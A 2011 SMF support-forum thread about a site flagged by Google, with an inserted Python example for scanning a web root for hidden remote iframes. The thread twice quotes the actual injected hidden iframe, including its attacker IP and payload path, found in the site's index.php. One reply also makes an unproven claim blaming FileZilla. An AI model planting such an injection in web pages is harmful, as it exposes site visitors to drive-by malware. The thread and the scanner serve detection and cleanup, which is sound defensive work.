Google thinks my website has a malware

Started by Joazo, January 23, 2011, 10:29:11 AM

Joazo

Google thinks my website has a malware but it's false 100%.
My website URL is www.magicpt.org.

Using SMF 2.0 RC4 with simpleportal 2.3.3.
What should I do?

Aleksi "Lex" Kilpinen

Actually, Google is probably right.

You have a hidden iframe in the code with
<iframe src="http://80.91.191.158/stats/priemIframe.php?part=2&hashftp=e0c2d48508fe124aee2727c5246ce60a&hashpage=07b8f1ff96250041b12099f711f72651" width=10 border=1 height=10 style="visibility:hidden"></iframe>


Slava
Ukraini!
"Before you allow people access to your forum, especially in an administrative position, you must be aware that that person can seriously damage your forum. Therefore, you should only allow people that you trust, implicitly, to have such access." -Douglas

How you can help SMF

Masterd


Joazo


Aleksi "Lex" Kilpinen

Well, you should really go through all your files to make sure they haven't been tampered with, just removing that line alone might not help much, and I'm not sure where that bit of code is actually hidden either...
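Added example, not part of any post in this thread: one way to go through every file for the kind of injected tag quoted above is to scan the web root for iframes that are hidden or tiny and load a remote URL. The suffix list, the 10-pixel threshold and the sample files (which use the documentation address 192.0.2.10) are assumptions chosen for illustration.

```python
import re
import tempfile
from pathlib import Path

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)
SIZE_RE = re.compile(r"""\b(width|height)\s*=\s*["']?(\d+)""", re.IGNORECASE)
SCAN_SUFFIXES = {".php", ".html", ".htm", ".js", ".tpl"}  # assumed file types
MAX_TINY = 10  # assumed threshold: frames this small are not meant to be seen

def suspicious_iframes(text):
    """Yield (line_no, src) for iframes that are hidden or tiny and load a remote URL."""
    for m in IFRAME_RE.finditer(text):
        tag = m.group(0)
        src = SRC_RE.search(tag)
        # Same-site frames (relative src) are skipped; only remote loads are reported.
        if not src or not re.match(r"(https?:)?//", src.group(1), re.IGNORECASE):
            continue
        sizes = [int(value) for _, value in SIZE_RE.findall(tag)]
        tiny = bool(sizes) and max(sizes) <= MAX_TINY
        if HIDDEN_RE.search(tag) or tiny:
            yield text.count("\n", 0, m.start()) + 1, src.group(1)

def scan_tree(root):
    """Return (relative_path, line_no, src) for every suspicious iframe under root."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            text = path.read_text(encoding="utf-8", errors="replace")
            for line_no, src in suspicious_iframes(text):
                hits.append((str(path.relative_to(root)), line_no, src))
    return hits

def demo():
    """Scan a constructed two-file web root: one injected file, one benign file."""
    with tempfile.TemporaryDirectory() as root:
        Path(root, "index.php").write_text(
            "<?php require 'SSI.php'; ?>\n"
            '<iframe src="http://192.0.2.10/stats/x.php?part=2" width=10 height=10 '
            'style="visibility:hidden"></iframe>\n')
        Path(root, "about.html").write_text(
            '<iframe src="/local/help.html" width="600" height="400"></iframe>\n')
        return scan_tree(root)

if __name__ == "__main__":
    for rel, line_no, src in demo():
        print(f"{rel}:{line_no}: hidden iframe -> {src}")
```

This only catches the plain HTML form seen in this thread; injections that are encoded or assembled at runtime need a comparison of each file against a clean copy of the same SMF release.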


Joazo

I asked my host. They told me they checked and it's clean. They told me to go to Google Webmasters and check my website there. I did it but still I have no idea how to remove the harmful code. My website was all OK yesterday and I didn't touch anything in the FTP or w/e. I went to sleep and woke up in the morning and saw it. How can that be?

Illori

Do you have any other PHP apps/scripts running on your server? Who is your host?

Joazo

@Illori

I just run SMF 2.0 RC4 with simpleportal 2.3.3, no other kinds of things.
My host is www.siteground.com.

P.S
I found in the index.php this:
<iframe src="http://80.91.191.158/stats/priemIframe.php?part=2&hashftp=e0c2d48508fe124aee2727c5246ce60a&hashpage=07b8f1ff96250041b12099f711f72651" width=10 border=1 height=10 style="visibility:hidden"></iframe>

I removed it. I hope this was the problem, but now the question is how someone was able to get to my index.php? Anyway, I changed my FTP password.


Illori

It is possible that your host is an overseller, and therefore may have had a security issue where another server was hacked and got access to yours. Please let your host know of the issue.

Joazo

I already told them and they told me it's all clean.

Illori

Well, tell them it is not, and show them the line you quoted above as proof.

Road Rash Jr.

Your host has indicated your shared server is clean and the presence of that code does not suggest it isn't. It does show that someone or something changed it. Best bet would be to write protect your index.php and any other files that don't require writing to by SMF.
This can be done with any FTP program.
Never argue with an Idiot like myself, they just drag you down to their level then beat you with experience.

Joazo


Illori

What do you mean protect? If you have a good host you should have no problems with hacking, given permissions are correct on the files/folders. How do I chmod? / What is chmod?

Aleksi "Lex" Kilpinen

On a properly configured host, and a default SMF install, the permissions don't really matter much either.
And no - just write protecting files will probably not help. If someone is able to modify your files, that someone is probably able to create files as well - so there is a hole somewhere to be patched, but where and how to patch it is another thing completely...

If your host says your server and account is clean, and still you found a piece of malicious code - you should present your host with that code, tell them what file you found it in, and ask them to find out how it got there.

int13

Hi,

It's not a fault of the web application. It's the fault of FileZilla... Your credentials have been saved by this program silently. And now a malware got these files from you. So the hack was done with your FTP/SSH credentials! You have to manually disable kiosk mode on FileZilla to prevent this. And better change all your passwords!

See my blog for more info on this:

Link removed by K@



Aleksi "Lex" Kilpinen

Yes, it's always a good idea in these cases to make sure your own computer is clean, there have been cases of malware using saved passwords from FTP clients and such. But it doesn't automatically mean that's what happened here.

Joazo

I am actually using FlashFXP and not FileZilla.
Anyway, we used a backup of our FTP files to the day before it happened and changed passwords to all.
Also installed forum firewall and our host gave us some lines to put inside the .htaccess against bad bots.
I hope it's enough.
